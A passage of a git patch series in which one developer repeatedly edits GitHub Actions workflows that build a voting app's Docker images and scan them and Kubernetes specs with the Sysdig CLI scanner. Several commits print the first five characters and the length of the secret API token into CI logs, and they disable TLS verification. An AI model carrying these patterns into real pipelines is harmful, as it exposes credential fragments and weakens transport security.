quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl $SYS_DIG_SECURE_URL \ - --skiptlsverify \ --loglevel debug \ - docker://worker - - - name: 🔍 Run Sysdig Scan (result) - run: | - docker run --rm \ - --platform linux/amd64 \ - --user 0 \ - -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ - quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl $SYS_DIG_SECURE_URL \ --skiptlsverify \ - --loglevel debug \ - docker://result + docker://voting-app From 097f1d71bf0461f8d66aa2ea629b7888ecca7137 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 12:39:13 +0900 Subject: [PATCH 33/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 289cefc793..d79a4ffd04 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -24,6 +24,8 @@ jobs: docker build -t result ./result - name: 🔍 DEBUG: Check if SECURE_API_TOKEN is available + env: + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | echo "🔍 Token Length: ${#SECURE_API_TOKEN}" echo "🔍 Token Head: ${SECURE_API_TOKEN::5}" @@ -33,8 +35,6 @@ jobs: else echo "✅ SECURE_API_TOKEN is available." fi - env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} - name: 🔍 Run Sysdig Scan (voting-app) run: | From c22d653f6947257be642cbaf480ddd31887c1a30 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 12:41:10 +0900 Subject: [PATCH 34/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index d79a4ffd04..b4437d4b12 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -49,4 +49,3 @@ jobs: --loglevel debug \ --skiptlsverify \ docker://voting-app - From 143bf3b656c9e29b08189768cac70a4d4b1c34ce Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 12:43:33 +0900 Subject: [PATCH 35/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index b4437d4b12..d2f00dace3 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -28,7 +28,7 @@ jobs: SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | echo "🔍 Token Length: ${#SECURE_API_TOKEN}" - echo "🔍 Token Head: ${SECURE_API_TOKEN::5}" + echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}" if [ -z "$SECURE_API_TOKEN" ]; then echo "❌ SECURE_API_TOKEN is NOT set!" exit 1 From a6eac462f4da4256c8689e132fd62c74bee81285 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 13:15:50 +0900 Subject: [PATCH 36/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index d2f00dace3..3274a20c30 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -14,29 +14,29 @@ jobs: SYS_DIG_SECURE_URL: https://app.au1.sysdig.com steps: - - name: 🛎️ Checkout code + - name: Checkout code uses: actions/checkout@v3 - - name: 🏗️ Build Docker images + - name: Build Docker images run: | docker build -t voting-app ./vote docker build -t worker ./worker docker build -t result ./result - - name: 🔍 DEBUG: Check if SECURE_API_TOKEN is available - env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + - name: Debug: Check if SECURE_API_TOKEN is available run: | - echo "🔍 Token Length: ${#SECURE_API_TOKEN}" - echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}" + echo "Token Length: ${#SECURE_API_TOKEN}" + echo "Token Head: ${SECURE_API_TOKEN:0:5}" if [ -z "$SECURE_API_TOKEN" ]; then - echo "❌ SECURE_API_TOKEN is NOT set!" + echo "SECURE_API_TOKEN is NOT set!" exit 1 else - echo "✅ SECURE_API_TOKEN is available." + echo "SECURE_API_TOKEN is available." fi + env: + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} - - name: 🔍 Run Sysdig Scan (voting-app) + - name: Run Sysdig Scan (voting-app) run: | docker run --rm \ --platform linux/amd64 \ From f0a0b2918248c7c6809f5259e3f0271e9cf00e15 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 13:35:20 +0900 Subject: [PATCH 37/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 3274a20c30..e5bb81f002 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -23,18 +23,17 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Debug: Check if SECURE_API_TOKEN is available + - name: Set SECURE_API_TOKEN env and debug run: | - echo "Token Length: ${#SECURE_API_TOKEN}" - echo "Token Head: ${SECURE_API_TOKEN:0:5}" + export SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" + echo "🔍 Token Length: ${#SECURE_API_TOKEN}" + echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}" if [ -z "$SECURE_API_TOKEN" ]; then - echo "SECURE_API_TOKEN is NOT set!" + echo "❌ SECURE_API_TOKEN is NOT set!" exit 1 else - echo "SECURE_API_TOKEN is available." + echo "✅ SECURE_API_TOKEN is available." fi - env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} - name: Run Sysdig Scan (voting-app) run: | @@ -43,9 +42,10 @@ jobs: --user 0 \ -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \ + -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl $SYS_DIG_SECURE_URL \ + --apiurl "$SYS_DIG_SECURE_URL" \ --loglevel debug \ --skiptlsverify \ docker://voting-app + From 8d4fd5a9a54b5ad7af478c1ea7bfa8b8671a1094 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 13:38:22 +0900 Subject: [PATCH 38/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 18 +++++------------- 1 file changed, 5 insertions(+), 13 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index e5bb81f002..71a48955ab 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -23,9 +23,11 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Set SECURE_API_TOKEN env and debug + - + name: Debug: Check if SECURE_API_TOKEN is available + env: + SECURE_API_TOKEN: "${{ secrets.SECURE_API_TOKEN }}" run: | - export SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" echo "🔍 Token Length: ${#SECURE_API_TOKEN}" echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}" if [ -z "$SECURE_API_TOKEN" ]; then @@ -37,15 +39,5 @@ jobs: - name: Run Sysdig Scan (voting-app) run: | - docker run --rm \ - --platform linux/amd64 \ - --user 0 \ - -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \ - -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ - quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl "$SYS_DIG_SECURE_URL" \ - --loglevel debug \ - --skiptlsverify \ - docker://voting-app + docker run --rm --platform linux/amd64 --user 0 -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" -v /var/run/docker.sock:/var/run/docker.sock -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" quay.io/sysdig/sysdig-cli-scanner:1.22.4 --apiurl "$SYS_DIG_SECURE_URL" --loglevel debug --skiptlsverify docker://voting-app From 6612d2c8deb1e0f2fd0dfc1baa4e17579af885c1 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 16:57:32 +0900 Subject: [PATCH 39/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 71a48955ab..264381be06 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -23,8 +23,7 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - - name: Debug: Check if SECURE_API_TOKEN is available + - name: Debug env: SECURE_API_TOKEN: "${{ secrets.SECURE_API_TOKEN }}" run: | @@ -35,9 +34,18 @@ jobs: exit 1 else echo "✅ SECURE_API_TOKEN is available." - fi - name: Run Sysdig Scan (voting-app) run: | - docker run --rm --platform linux/amd64 --user 0 -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" -v /var/run/docker.sock:/var/run/docker.sock -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" quay.io/sysdig/sysdig-cli-scanner:1.22.4 --apiurl "$SYS_DIG_SECURE_URL" --loglevel debug --skiptlsverify docker://voting-app + docker run --rm \ + --platform linux/amd64 \ + --user 0 \ + -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \ + -v /var/run/docker.sock:/var/run/docker.sock \ + -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ + quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + --apiurl "$SYS_DIG_SECURE_URL" \ + --loglevel debug \ + --skiptlsverify \ + docker://voting-app From 621e2e7675806f27b9cd3149e9b6e44aad62a533 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 17:02:39 +0900 Subject: [PATCH 40/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 264381be06..729f01a6dd 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -23,9 +23,9 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Debug + - name: Debug: Check if SECURE_API_TOKEN is available env: - SECURE_API_TOKEN: "${{ secrets.SECURE_API_TOKEN }}" + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | echo "🔍 Token Length: ${#SECURE_API_TOKEN}" echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}" @@ -34,6 +34,7 @@ jobs: exit 1 else echo "✅ SECURE_API_TOKEN is available." + fi - name: Run Sysdig Scan (voting-app) run: | From 487ae85f27ec16c2a69295583a9e198876a251d3 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 17:13:55 +0900 Subject: [PATCH 41/73] Fix: Ensure SECURE_API_TOKEN is injected properly --- .github/workflows/scan.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 729f01a6dd..fd883020ed 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -23,7 +23,7 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Debug: Check if SECURE_API_TOKEN is available + - name: Debug env: SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | From 75f811c3b8d64cf76f1515a1b4ab435c66b80695 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 17:17:44 +0900 Subject: [PATCH 42/73] Fix: Ensure SECURE_TOKEN is injected properly --- .github/workflows/scan.yml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index fd883020ed..dcc8d7c3e8 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -25,15 +25,15 @@ jobs: - name: Debug env: - SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + SYSDIG_SECURE_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} run: | - echo "🔍 Token Length: ${#SECURE_API_TOKEN}" - echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}" - if [ -z "$SECURE_API_TOKEN" ]; then - echo "❌ SECURE_API_TOKEN is NOT set!" + echo "🔍 Token Length: ${#SYSDIG_SECURE_TOKEN}" + echo "🔍 Token Head: ${SYSDIG_SECURE_TOKEN:0:5}" + if [ -z "$SYSDIG_SECURE_TOKEN" ]; then + echo "❌ SYSDIG_SECURE_TOKEN is NOT set!" exit 1 else - echo "✅ SECURE_API_TOKEN is available." + echo "✅ SYSDIG_SECURE_TOKEN is available." fi - name: Run Sysdig Scan (voting-app) @@ -43,7 +43,7 @@ jobs: --user 0 \ -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ + -e SYSDIG_SECURE_TOKEN="${{ secrets.SYSDIG_SECURE_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl "$SYS_DIG_SECURE_URL" \ --loglevel debug \ From 40634cad25b01abb67770615405235ea2555f6a9 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 17:24:20 +0900 Subject: [PATCH 43/73] Fix: Ensure SECURE_TOKEN is injected properly --- .github/workflows/scan.yml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index dcc8d7c3e8..fd883020ed 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -25,15 +25,15 @@ jobs: - name: Debug env: - SYSDIG_SECURE_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | - echo "🔍 Token Length: ${#SYSDIG_SECURE_TOKEN}" - echo "🔍 Token Head: ${SYSDIG_SECURE_TOKEN:0:5}" - if [ -z "$SYSDIG_SECURE_TOKEN" ]; then - echo "❌ SYSDIG_SECURE_TOKEN is NOT set!" + echo "🔍 Token Length: ${#SECURE_API_TOKEN}" + echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}" + if [ -z "$SECURE_API_TOKEN" ]; then + echo "❌ SECURE_API_TOKEN is NOT set!" exit 1 else - echo "✅ SYSDIG_SECURE_TOKEN is available." + echo "✅ SECURE_API_TOKEN is available." fi - name: Run Sysdig Scan (voting-app) @@ -43,7 +43,7 @@ jobs: --user 0 \ -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SYSDIG_SECURE_TOKEN="${{ secrets.SYSDIG_SECURE_TOKEN }}" \ + -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl "$SYS_DIG_SECURE_URL" \ --loglevel debug \ From bd118142e3bac2a70c29d7176269e649785dc43f Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 17:34:31 +0900 Subject: [PATCH 44/73] Fix: Ensure SECURE_TOKEN is injected properly --- .github/workflows/scan.yml | 34 +++++++++++++++++----------------- 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index fd883020ed..218b319abd 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -1,42 +1,42 @@ -name: Sysdig Image Scan +name: Voting App Build & Scan on: push: branches: - main + pull_request: workflow_dispatch: jobs: - image-scan: + build-and-scan: runs-on: ubuntu-latest env: SYS_DIG_SECURE_URL: https://app.au1.sysdig.com steps: - - name: Checkout code + - name: Checkout source uses: actions/checkout@v3 - - name: Build Docker images + - name: Set up Docker Buildx + uses: docker/setup-buildx-action@v2 + + - name: Log in to DockerHub (optional) + if: secrets.DOCKERHUB_USERNAME && secrets.DOCKERHUB_TOKEN + uses: docker/login-action@v2 + with: + username: ${{ secrets.DOCKERHUB_USERNAME }} + password: ${{ secrets.DOCKERHUB_TOKEN }} + + - name: Build Voting App images run: | docker build -t voting-app ./vote docker build -t worker ./worker docker build -t result ./result - - name: Debug + - name: Scan image with Sysdig CLI Scanner env: SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} - run: | - echo "🔍 Token Length: ${#SECURE_API_TOKEN}" - echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}" - if [ -z "$SECURE_API_TOKEN" ]; then - echo "❌ SECURE_API_TOKEN is NOT set!" - exit 1 - else - echo "✅ SECURE_API_TOKEN is available." - fi - - - name: Run Sysdig Scan (voting-app) run: | docker run --rm \ --platform linux/amd64 \ @@ -46,7 +46,7 @@ jobs: -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl "$SYS_DIG_SECURE_URL" \ - --loglevel debug \ + --loglevel info \ --skiptlsverify \ docker://voting-app From f0b136a7ce846fdfad339b52343e22b1360a90d1 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 17:40:33 +0900 Subject: [PATCH 45/73] Fix: Ensure --- .github/workflows/scan.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 218b319abd..4e0d89ceab 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -49,4 +49,3 @@ jobs: --loglevel info \ --skiptlsverify \ docker://voting-app - From 91bf86164f8236c86d9c3d61c0be1581abd2fb12 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 17:44:17 +0900 Subject: [PATCH 46/73] Fix: Ensure --- .github/workflows/scan.yml | 15 +++------------ 1 file changed, 3 insertions(+), 12 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 4e0d89ceab..54afebe676 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -22,7 +22,7 @@ jobs: uses: docker/setup-buildx-action@v2 - name: Log in to DockerHub (optional) - if: secrets.DOCKERHUB_USERNAME && secrets.DOCKERHUB_TOKEN + if: ${{ secrets.DOCKERHUB_USERNAME && secrets.DOCKERHUB_TOKEN }} uses: docker/login-action@v2 with: username: ${{ secrets.DOCKERHUB_USERNAME }} @@ -38,14 +38,5 @@ jobs: env: SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} run: | - docker run --rm \ - --platform linux/amd64 \ - --user 0 \ - -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \ - -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ - quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl "$SYS_DIG_SECURE_URL" \ - --loglevel info \ - --skiptlsverify \ - docker://voting-app + docker run --rm --platform linux/amd64 --user 0 -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" -v /var/run/docker.sock:/var/run/docker.sock -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" quay.io/sysdig/sysdig-cli-scanner:1.22.4 --apiurl "$SYS_DIG_SECURE_URL" --loglevel info --skiptlsverify docker://voting-app + From 1da6bbc275ac8b4592d18676523b0e7f51150d89 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 20:04:27 +0900 Subject: [PATCH 47/73] Add Sysdig CI workflow for Docker and IaC scan --- .github/workflows/sysdig-scan.yml | 42 +++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 .github/workflows/sysdig-scan.yml diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml new file mode 100644 index 0000000000..2200ba4624 --- /dev/null +++ b/.github/workflows/sysdig-scan.yml @@ -0,0 +1,42 @@ +name: Sysdig CI Scan + +on: + pull_request: + branches: + - main + push: + branches: + - main + +jobs: + scan: + name: Sysdig Scan Docker + IaC + runs-on: ubuntu-latest + + steps: + - name: Checkout code + uses: actions/checkout@v3 + + - name: Set up Docker Buildx + uses: docker/setup-buildx-action@v2 + + - name: Build vote image + run: | + docker build -t vote-image ./vote + + - name: Scan Docker image with Sysdig + run: | + docker run --rm \ + -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ + quay.io/sysdig/sysdig-cli-scanner:latest \ + --apiurl ${{ secrets.SYSDIG_API_URL }} \ + vote-image + + - name: Scan IaC (k8s-specifications) + run: | + docker run --rm \ + -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ + -v ${{ github.workspace }}:/iac \ + quay.io/sysdig/sysdig-cli-scanner:latest \ + --apiurl ${{ secrets.SYSDIG_API_URL }} \ + --iac scan /iac/k8s-specifications \ No newline at end of file From 99c124ece92a9a50b4c5ba8ba047cb04c0dd47ba Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 20:34:34 +0900 Subject: [PATCH 48/73] Trigger CI re-run From af2c51564454795f3f8169393ee50d1d52bfc428 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 20:36:53 +0900 Subject: [PATCH 49/73] Trigger CI: re-run Sysdig scan From 0f825f3f9a797bbcee68c814735d896625518bfc Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 20:45:41 +0900 Subject: [PATCH 50/73] Fix YAML syntax in 'on' section for proper CI trigger --- .github/workflows/sysdig-scan.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 2200ba4624..f0a24528be 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -4,9 +4,11 @@ on: pull_request: branches: - main + - ci/sysdig-integration push: branches: - main + - ci/sysdig-integration jobs: scan: @@ -39,4 +41,4 @@ jobs: -v ${{ github.workspace }}:/iac \ quay.io/sysdig/sysdig-cli-scanner:latest \ --apiurl ${{ secrets.SYSDIG_API_URL }} \ - --iac scan /iac/k8s-specifications \ No newline at end of file + --iac scan /iac/k8s-specifications From 4367a0be50e3756303c937a3132018077fd2a583 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 20:54:25 +0900 Subject: [PATCH 51/73] Fix: pass vote image to scanner via tar file --- .github/workflows/sysdig-scan.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index f0a24528be..b4bc08b0f0 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -25,14 +25,16 @@ jobs: - name: Build vote image run: | docker build -t vote-image ./vote + docker save vote-image -o vote-image.tar - name: Scan Docker image with Sysdig run: | docker run --rm \ -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ + -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \ quay.io/sysdig/sysdig-cli-scanner:latest \ --apiurl ${{ secrets.SYSDIG_API_URL }} \ - vote-image + --input /tmp/vote-image.tar - name: Scan IaC (k8s-specifications) run: | From 94ae89eafd6ab238a0e7dbbda07c000dae1392a4 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 20:57:01 +0900 Subject: [PATCH 52/73] Fix: pass vote image to scanner via tar file --- .github/workflows/sysdig-scan.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index b4bc08b0f0..afad251062 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -34,7 +34,7 @@ jobs: -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \ quay.io/sysdig/sysdig-cli-scanner:latest \ --apiurl ${{ secrets.SYSDIG_API_URL }} \ - --input /tmp/vote-image.tar + --image-archive /tmp/vote-image.tar - name: Scan IaC (k8s-specifications) run: | From 226d1459f755a4e7c15d7d53f0b969a748c61b74 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 21:01:18 +0900 Subject: [PATCH 53/73] Fix: lock CLI version to 1.22.4 and use --image-archive --- .github/workflows/sysdig-scan.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index afad251062..e066136e39 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -32,7 +32,7 @@ jobs: docker run --rm \ -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \ - quay.io/sysdig/sysdig-cli-scanner:latest \ + quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl ${{ secrets.SYSDIG_API_URL }} \ --image-archive /tmp/vote-image.tar @@ -41,6 +41,6 @@ jobs: docker run --rm \ -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ -v ${{ github.workspace }}:/iac \ - quay.io/sysdig/sysdig-cli-scanner:latest \ + quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl ${{ secrets.SYSDIG_API_URL }} \ --iac scan /iac/k8s-specifications From 9da311efa3550266428f76b093fa7c041aad67b6 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 21:04:32 +0900 Subject: [PATCH 54/73] Fix: use --standalone --input-file with CLI 1.22.4 --- .github/workflows/sysdig-scan.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index e066136e39..038287a7ab 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -33,8 +33,8 @@ jobs: -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl ${{ secrets.SYSDIG_API_URL }} \ - --image-archive /tmp/vote-image.tar + --standalone + --input-file /tmp/vote-image.tar - name: Scan IaC (k8s-specifications) run: | From 510297205a104daf9d22f578f89f12ab0d3f0e80 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 21:07:58 +0900 Subject: [PATCH 55/73] Fix: use --standalone --input-file with CLI 1.22.4 --- .github/workflows/sysdig-scan.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 038287a7ab..28fbf3c3c7 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -34,7 +34,8 @@ jobs: -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --standalone - --input-file /tmp/vote-image.tar + --input-file /tmp/vote-image.tar \ + dockersamples/examplevotingapp_vote - name: Scan IaC (k8s-specifications) run: | From 9ff0d12a878b609bfbff8202b90ddbad559e49ef Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 21:11:57 +0900 Subject: [PATCH 56/73] Fix: use --standalone --input-file with CLI 1.22.4 --- .github/workflows/sysdig-scan.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 28fbf3c3c7..22c3c08019 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -1,11 +1,11 @@ name: Sysdig CI Scan on: - pull_request: + push: branches: - main - ci/sysdig-integration - push: + pull_request: branches: - main - ci/sysdig-integration @@ -27,15 +27,15 @@ jobs: docker build -t vote-image ./vote docker save vote-image -o vote-image.tar - - name: Scan Docker image with Sysdig + - name: Scan Docker image from archive with Sysdig (standalone) run: | docker run --rm \ -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --standalone + --standalone \ --input-file /tmp/vote-image.tar \ - dockersamples/examplevotingapp_vote + vote-image:ci - name: Scan IaC (k8s-specifications) run: | From 1e296dd1ea1cb501a565f72215daafe75632b6e5 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 21:20:22 +0900 Subject: [PATCH 57/73] Use Sysdig CLI Scanner v1.24.2 for stable tar support --- .github/workflows/sysdig-scan.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git 